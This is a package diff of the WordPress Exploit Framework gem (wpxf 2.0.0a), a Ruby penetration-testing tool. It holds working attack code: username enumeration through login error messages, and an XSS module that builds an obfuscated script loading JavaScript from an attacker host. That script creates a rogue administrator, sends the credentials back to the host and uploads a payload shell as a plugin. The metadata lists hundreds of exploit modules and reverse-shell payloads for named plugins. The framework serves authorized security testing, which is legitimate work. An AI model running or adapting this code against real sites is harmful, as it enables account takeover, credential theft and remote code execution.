wpxf 2.0.0a

data/lib/wpxf/wordpress/user.rb

@@ -0,0 +1,35 @@
+# frozen_string_literal: true
+
+# Provides functionality required to gather information about users.
+module Wpxf::WordPress::User
+  # Checks if a user exists.
+  # @param user [String] username to check.
+  # @return [Boolean] true if the user exists.
+  def wordpress_user_exists?(user)
+    res = execute_post_request(
+      url: wordpress_url_login,
+      body: wordpress_login_post_body(user, Wpxf::Utility::Text.rand_alpha(6))
+    )
+
+    return true if res && res.code == 200 && (
+      res.body.to_s =~ /Incorrect password/ ||
+      res.body.to_s =~ /document\.getElementById\('user_pass'\)/
+    )
+
+    false
+  end
+
+  # @param cookie [String] a valid session cookie.
+  # @return [Hash, nil] the profile form fields and their default values.
+  def wordpress_user_profile_form_fields(cookie)
+    res = execute_get_request(url: wordpress_url_admin_profile, cookie: cookie)
+    return nil unless res.code == 200
+
+    fields = {}
+    res.body.scan(/<input.*?name="(.*?)".*?value="(.*?)".*?>/i) do |name, value|
+      fields[name] = value
+    end
+
+    fields
+  end
+end

data/lib/wpxf/wordpress/xss.rb

@@ -0,0 +1,143 @@
+# frozen_string_literal: true
+
+require 'erb'
+
+# Provides helper methods for generating scripts for XSS attacks.
+module Wpxf::WordPress::Xss
+  include Wpxf
+  include Wpxf::Net::HttpServer
+  include Wpxf::WordPress::Plugin
+  include ERB::Util
+
+  # Initialize a new instance of {Xss}.
+  def initialize
+    super
+    @success = false
+
+    _update_info_without_validation(
+      desc: %(
+        This module stores a script which will be executed when
+        an admin user visits the vulnerable page. Execution of the script
+        will create a new admin user which will be used to upload
+        and execute the selected payload in the context of the
+        web server.
+      )
+    )
+
+    register_options([
+      StringOption.new(
+        name: 'xss_host',
+        desc: 'The address of the host listening for a connection',
+        required: true
+      ),
+      StringOption.new(
+        name: 'xss_path',
+        desc: 'The path to access via the cross-site request',
+        default: Utility::Text.rand_alpha(8),
+        required: true
+      )
+    ])
+  end
+
+  # @return [String] the address of the host listening for a conneciton.
+  def xss_host
+    normalized_option_value('xss_host')
+  end
+
+  # @return [String] the path to make cross-site requests to.
+  def xss_path
+    normalized_option_value('xss_path')
+  end
+
+  # @return [String] the full URL to make cross-site requests to.
+  def xss_url
+    "http://#{xss_host}:#{http_server_bind_port}/#{xss_path}"
+  end
+
+  # @return [String] a script that includes the user creation JavaScript.
+  def xss_include_script
+    script = [
+      'var a = document.createElement("script");',
+      "a.setAttribute(\"src\", \"#{xss_url}\");",
+      'document.head.appendChild(a);'
+    ].join
+
+    "eval(decodeURIComponent(/#{url_encode(script)}/.source))"
+  end
+
+  # @return [String] a script that includes the user creation JavaScript
+  #   without any spaces or quotation marks in the script that may be
+  #   escaped by the likes of magic-quotes.
+  def xss_ascii_encoded_include_script
+    "eval(String.fromCharCode(#{xss_include_script.bytes.join(',')}))"
+  end
+
+  # @return [String] the URL encoded value of #xss_ascii_encoded_include_script.
+  def xss_url_and_ascii_encoded_include_script
+    url_encode(xss_ascii_encoded_include_script)
+  end
+
+  # @return [String] a script that will create a new admin user and post the
+  #   credentials back to {#xss_url}.
+  def wordpress_js_create_user
+    variables = {
+      '$wordpress_url_new_user' => wordpress_url_new_user,
+      '$username' => Utility::Text.rand_alpha(6),
+      '$password' => "#{Utility::Text.rand_alphanumeric(10)}!",
+      '$email' => "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com",
+      '$xss_url' => xss_url
+    }
+
+    create_user_script = Wpxf::DataFile.new('js', 'create_wp_user.js')
+
+    %(
+      #{js_ajax_download}
+      #{js_ajax_post}
+      #{create_user_script.content_with_named_vars(variables)}
+    )
+  end
+
+  # Default HTTP request handler for XSS modules which will serve the script
+  # required to create new administrator users and upload a payload shell.
+  # @param path [String] the path requested.
+  # @param params [Hash] the query string parameters.
+  # @param headers [Hash] the HTTP headers.
+  # @return [String] the response body to send to the client.
+  def on_http_request(path, params, headers)
+    if params['u'] && params['p']
+      emit_success "Created a new administrator user, #{params['u']}:#{params['p']}"
+      store_credentials params['u'], params['p']
+      stop_http_server
+
+      # Set this for #run to pick up to determine success state
+      @success = upload_shell(params['u'], params['p'])
+
+      ''
+    else
+      emit_info 'Incoming request received, serving JavaScript...'
+      wordpress_js_create_user
+    end
+  end
+
+  # Upload the selected payload as a WordPress plugin.
+  # @param username [String] the username to authenticate with.
+  # @param password [String] the password to authenticate with.
+  # @return [Boolean] true if successful.
+  def upload_shell(username, password)
+    cookie = authenticate_with_wordpress(username, password)
+    return false unless cookie
+
+    plugin_name = Utility::Text.rand_alpha(10)
+    payload_name = Utility::Text.rand_alpha(10)
+
+    emit_info 'Uploading payload...'
+    res = upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
+
+    !res.nil?
+  end
+
+  # @return [Boolean] true if the XSS shell upload was successful.
+  def xss_shell_success
+    @success
+  end
+end

data/wpxf.gemspec

@@ -0,0 +1,33 @@
+# frozen_string_literal: true
+
+Gem::Specification.new do |s|
+  s.name = 'wpxf'
+  s.version = '2.0.0a'
+  s.date = '2018-07-12'
+  s.summary = 'WordPress Exploit Framework'
+  s.description = 'A Ruby framework designed to aid in the penetration testing of WordPress systems'
+  s.authors = ['rastating']
+  s.email = 'rob@rastating.com'
+  s.files = %w[lib db data bin].map { |d| Dir["#{d}/**/*"] }.flatten + ['wpxf.gemspec']
+  s.homepage = 'https://github.com/rastating/wordpress-exploit-framework'
+  s.license = 'GPL-3.0'
+  s.executables << 'wpxf'
+  s.required_ruby_version = '>= 2.4.4'
+
+  s.add_dependency 'colorize', '~> 0.8'
+  s.add_dependency 'mime-types', '~> 3.1'
+  s.add_dependency 'nokogiri', '~> 1.8'
+  s.add_dependency 'rake', '~> 12.3'
+  s.add_dependency 'require_all', '~> 2.0'
+  s.add_dependency 'rubyzip', '~> 1.2'
+  s.add_dependency 'sequel', '~> 5.9'
+  s.add_dependency 'slop', '~> 4.6'
+  s.add_dependency 'sqlite3', '~> 1.3'
+  s.add_dependency 'typhoeus', '~> 1.3'
+
+  s.add_development_dependency 'coveralls', '~> 0.8'
+  s.add_development_dependency 'database_cleaner', '~> 1.7'
+  s.add_development_dependency 'rspec', '~> 3.7'
+  s.add_development_dependency 'rspec_sequel_matchers', '~> 0.5'
+  s.add_development_dependency 'yard', '~> 0.9'
+end

metadata

@@ -0,0 +1,708 @@
+--- !ruby/object:Gem::Specification
+name: wpxf
+version: !ruby/object:Gem::Version
+  version: 2.0.0a
+platform: ruby
+authors:
+- rastating
+autorequire: 
+bindir: bin
+cert_chain: []
+date: 2018-07-12 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+  name: colorize
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.8'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.8'
+- !ruby/object:Gem::Dependency
+  name: mime-types
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.1'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.1'
+- !ruby/object:Gem::Dependency
+  name: nokogiri
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.8'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.8'
+- !ruby/object:Gem::Dependency
+  name: rake
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '12.3'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '12.3'
+- !ruby/object:Gem::Dependency
+  name: require_all
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '2.0'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '2.0'
+- !ruby/object:Gem::Dependency
+  name: rubyzip
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.2'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.2'
+- !ruby/object:Gem::Dependency
+  name: sequel
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '5.9'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '5.9'
+- !ruby/object:Gem::Dependency
+  name: slop
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '4.6'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '4.6'
+- !ruby/object:Gem::Dependency
+  name: sqlite3
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.3'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.3'
+- !ruby/object:Gem::Dependency
+  name: typhoeus
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.3'
+  type: :runtime
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.3'
+- !ruby/object:Gem::Dependency
+  name: coveralls
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.8'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.8'
+- !ruby/object:Gem::Dependency
+  name: database_cleaner
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.7'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '1.7'
+- !ruby/object:Gem::Dependency
+  name: rspec
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.7'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '3.7'
+- !ruby/object:Gem::Dependency
+  name: rspec_sequel_matchers
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.5'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.5'
+- !ruby/object:Gem::Dependency
+  name: yard
+  requirement: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.9'
+  type: :development
+  prerelease: false
+  version_requirements: !ruby/object:Gem::Requirement
+    requirements:
+    - - "~>"
+      - !ruby/object:Gem::Version
+        version: '0.9'
+description: A Ruby framework designed to aid in the penetration testing of WordPress
+  systems
+email: rob@rastating.com
+executables:
+- wpxf
+extensions: []
+extra_rdoc_files: []
+files:
+- bin/wpxf
+- data/banners/default.txt
+- data/js/ajax_download.js
+- data/js/ajax_post.js
+- data/js/create_wp_user.js
+- data/js/post.js
+- data/json/browser_usage_by_frequency.json
+- data/json/commands.json
+- data/php/bind_php.php
+- data/php/download_exec.php
+- data/php/exec.php
+- data/php/exec_methods.php
+- data/php/meterpreter_bind_tcp.php
+- data/php/meterpreter_bind_tcp_ipv6.php
+- data/php/meterpreter_reverse_tcp.php
+- data/php/preamble.php
+- data/php/reverse_tcp.php
+- db/config.yml
+- db/env.rb
+- db/migrations/001_create_workspaces.rb
+- db/migrations/002_create_credentials.rb
+- db/migrations/003_add_credential_type.rb
+- db/migrations/004_add_unique_workspace_name_index.rb
+- db/migrations/005_add_logs.rb
+- db/migrations/006_create_modules.rb
+- db/migrations/007_create_loot_items.rb
+- lib/wpxf.rb
+- lib/wpxf/cli/auto_complete.rb
+- lib/wpxf/cli/banner.rb
+- lib/wpxf/cli/console.rb
+- lib/wpxf/cli/context.rb
+- lib/wpxf/cli/creds.rb
+- lib/wpxf/cli/help.rb
+- lib/wpxf/cli/loaded_module.rb
+- lib/wpxf/cli/loot.rb
+- lib/wpxf/cli/module_cache.rb
+- lib/wpxf/cli/module_info.rb
+- lib/wpxf/cli/modules.rb
+- lib/wpxf/cli/options.rb
+- lib/wpxf/cli/output.rb
+- lib/wpxf/cli/workspace.rb
+- lib/wpxf/core.rb
+- lib/wpxf/core/data_file.rb
+- lib/wpxf/core/event_emitter.rb
+- lib/wpxf/core/module.rb
+- lib/wpxf/core/module_authentication.rb
+- lib/wpxf/core/module_info.rb
+- lib/wpxf/core/options.rb
+- lib/wpxf/core/opts/boolean_option.rb
+- lib/wpxf/core/opts/enum_option.rb
+- lib/wpxf/core/opts/integer_option.rb
+- lib/wpxf/core/opts/option.rb
+- lib/wpxf/core/opts/path_option.rb
+- lib/wpxf/core/opts/port_option.rb
+- lib/wpxf/core/opts/string_option.rb
+- lib/wpxf/core/output_emitters.rb
+- lib/wpxf/core/payload.rb
+- lib/wpxf/db.rb
+- lib/wpxf/db/credentials.rb
+- lib/wpxf/db/loot.rb
+- lib/wpxf/helpers/export.rb
+- lib/wpxf/models/credential.rb
+- lib/wpxf/models/log.rb
+- lib/wpxf/models/loot_item.rb
+- lib/wpxf/models/module.rb
+- lib/wpxf/models/workspace.rb
+- lib/wpxf/modules.rb
+- lib/wpxf/modules/auxiliary/dos/load_scripts_dos.rb
+- lib/wpxf/modules/auxiliary/dos/long_password_dos.rb
+- lib/wpxf/modules/auxiliary/dos/post_grid_file_deletion.rb
+- lib/wpxf/modules/auxiliary/dos/wp_v4.7.2_csrf_dos.rb
+- lib/wpxf/modules/auxiliary/file_download/ad_widget_php_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/all_in_one_migration_export.rb
+- lib/wpxf/modules/auxiliary/file_download/antioch_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/candidate_application_form_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/cp_image_store_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/duplicator_csrf_db_export.rb
+- lib/wpxf/modules/auxiliary/file_download/ghost_unrestricted_export_download.rb
+- lib/wpxf/modules/auxiliary/file_download/history_collection_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/imdb_profile_widget_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/mail_masta_unauthenticated_local_file_inclusion.rb
+- lib/wpxf/modules/auxiliary/file_download/membership_simplified_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/memphis_documents_library_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/recent_backups_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_disclosure.rb
+- lib/wpxf/modules/auxiliary/file_download/simple_download_monitor_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/simple_image_manipulator_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/site_editor_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/wp_background_takeover_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/wp_marketplace_v2.4_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/wp_vault_file_download.rb
+- lib/wpxf/modules/auxiliary/file_download/wptf_image_gallery_arbitrary_file_download.rb
+- lib/wpxf/modules/auxiliary/hash_dump/events_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/gallery_album_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/jtrt_responsive_tables_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/registrationmagic_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/simple_ads_manager_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/simple_events_calendar_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/sql_shortcode_hash_dump.rb
+- lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb
+- lib/wpxf/modules/auxiliary/hash_dump/ultimate_product_catalogue_hash_dump.rb
+- lib/wpxf/modules/auxiliary/info/download_manager_directory_listing_disclosure.rb
+- lib/wpxf/modules/auxiliary/info/download_monitor_log_export.rb
+- lib/wpxf/modules/auxiliary/info/email_subscribers_user_list_disclosure.rb
+- lib/wpxf/modules/auxiliary/info/file_manager_database_credentials.rb
+- lib/wpxf/modules/auxiliary/info/user_meta_manager_information_disclosure.rb
+- lib/wpxf/modules/auxiliary/info/woocommerce_email_test_order_disclosure.rb
+- lib/wpxf/modules/auxiliary/info/woocommerce_order_import_export_order_disclosure.rb
+- lib/wpxf/modules/auxiliary/info/wp_v4.7_user_info_disclosure.rb
+- lib/wpxf/modules/auxiliary/misc/email_users_csrf_bulk_mail.rb
+- lib/wpxf/modules/auxiliary/misc/qards_local_port_scan.rb
+- lib/wpxf/modules/auxiliary/misc/simple_ads_manager_sql_injection.rb
+- lib/wpxf/modules/auxiliary/misc/wp_v4.7.1_content_injection.rb
+- lib/wpxf/modules/auxiliary/priv_esc/custom_contact_forms_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/download_manager_authenticated_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/download_manager_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/easy_cart_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/platform_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/super_socializer_auth_bypass.rb
+- lib/wpxf/modules/auxiliary/priv_esc/user_meta_manager_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/user_role_editor_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/wp_front_end_profile_privilege_escalation.rb
+- lib/wpxf/modules/auxiliary/priv_esc/wplms_privilege_escalation.rb
+- lib/wpxf/modules/exploit/rfi/advanced_custom_fields_remote_file_inclusion.rb
+- lib/wpxf/modules/exploit/rfi/fast_image_adder_v1.1_rfi_shell_upload.rb
+- lib/wpxf/modules/exploit/rfi/flickr_picture_backup_rfi_shell_upload.rb
+- lib/wpxf/modules/exploit/rfi/gwolle_guestbook_remote_file_inclusion.rb
+- lib/wpxf/modules/exploit/rfi/wp_mobile_detector_rfi_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/accesspress_anonymous_post_pro_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/acf_frontend_display_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/adblock_blocker_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/admin_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/aries_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/avada_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/awake_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/beach_apollo_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/bretheon_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/centum_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/charity_theme_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/construct_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/creative_contact_form_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/delete_all_comments_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/designfolio_plus_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/divi_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/easy_cart_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/echelon_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/elegance_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/estatik_v2.2.5_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/evo_theme_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/front_end_file_upload_and_manager_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/fusion_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/gallery_pro_theme_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/gravity_forms_v1.8.19_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/holding_pattern_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/inboundio_marketing_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/incredible_wp_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/infusionsoft_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mailcwp_authenticated_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mailcwp_unauthenticated_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mailpoet_newsletters_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/manbiz2_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/medicate_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/method_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/micro_theme_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mobile_app_builder_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mobile_app_native_v3_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/mobile_friendly_app_builder_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/modular_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/myriad_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/n_media_website_contact_form_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/n_media_website_contact_form_v1.9_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/neosense_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/ninja_forms_unauthenticated_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/participants_database_v1.5.4.8_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/persuasion_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/photo_album_plus_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/photo_gallery_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/premium_seo_pack_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/reflex_gallery_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/seabird_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/showbiz_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/simplecart_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/soulmedic_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/striking_r_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/super_socializer_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/symposium_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/tevolution_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/ultimate_member_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/ultimate_product_catalogue_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/ultimatum_revslider_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/userpro_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/webapp_builder_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/windows_desktop_and_iphone_photo_uploader_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/woocommerce_amazon_affiliates_v8_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/woocommerce_product_addons_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/work_the_flow_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wp2android_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wp_front_end_repository_manager_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wp_marketplace_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wp_support_plus_responsive_ticket_system_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wpshop_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wptouch_authenticated_shell_upload.rb
+- lib/wpxf/modules/exploit/shell/wsecure_lite_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/2kb_amazon_affiliates_store_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/admin_custom_login_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/adsense_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/affiliate_ads_builder_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/affiliatewp_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/ajax_random_post_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/all_in_one_migration_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/all_in_one_schema_rich_snippets_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/all_in_one_wp_security_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/alpine_photo_tile_for_instagram_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/answer_my_question_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/anti_plagiarism_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/anyvar_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/atahualpa_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/backup_guard_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/brafton_content_importer_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_featured_posts_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_google_analytics_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_google_maps_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_latest_posts_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_linkedin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_pinterest_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_popular_posts_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_portfolio_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_smtp_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/bws_testimonials_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/caldera_forms_v1.5.4_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/captcha_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/car_rental_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/check_email_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/claptastic_clap_button_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/code_snippets_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/colorway_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/concours_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/connections_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/contact_form_multi_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/contact_form_plugin_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/contact_form_to_db_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/content_grabber_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/content_slide_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/count_per_day_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/csv_import_export_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/csv_import_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/custom_admin_page_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/custom_fields_search_reflected_xss_shell_upload.rb
+- lib/wpxf/modules/exploit/xss/reflected/custom_map_xss_shell_upload.rb
